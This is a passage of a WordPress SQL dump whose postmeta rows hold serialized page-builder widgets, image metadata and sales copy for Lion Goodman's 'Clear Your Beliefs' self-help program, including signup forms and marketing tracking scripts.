<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:542:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1452, 1875, '_wp_attached_file', '2014/07/Clear-Your-Beliefs.jpg'),
(1453, 1875, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:863;s:6:"height";i:442;s:4:"file";s:30:"2014/07/Clear-Your-Beliefs.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"Clear-Your-Beliefs-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"Clear-Your-Beliefs-300x153.jpg";s:5:"width";i:300;s:6:"height";i:153;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:30:"Clear-Your-Beliefs-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:30:"Clear-Your-Beliefs-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:30:"Clear-Your-Beliefs-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:30:"Clear-Your-Beliefs-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1456, 1893, '_wp_attached_file', '2014/07/Clear-your-beliefs-ebook.png'),
(1457, 1893, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:316;s:6:"height";i:471;s:4:"file";s:36:"2014/07/Clear-your-beliefs-ebook.png";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"Clear-your-beliefs-ebook-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:36:"Clear-your-beliefs-ebook-201x300.png";s:5:"width";i:201;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:36:"Clear-your-beliefs-ebook-220x220.png";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:9:"image/png";}s:15:"product-display";a:4:{s:4:"file";s:36:"Clear-your-beliefs-ebook-316x400.png";s:5:"width";i:316;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:36:"Clear-your-beliefs-ebook-170x200.png";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:14:"post-thumbnail";a:4:{s:4:"file";s:36:"Clear-your-beliefs-ebook-316x372.png";s:5:"width";i:316;s:6:"height";i:372;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1458, 1141, 'panels_data', 'a:0:{}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1459, 1933, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1673:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="Download the App" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1452:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong>Clear Your Limiting\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative; bottom: 15px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:542:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1469, 1941, '_edit_last', '2'),
(1470, 1941, '_wp_page_template', 'page-templates/full-width.php');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1471, 1941, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72843:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></center></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" 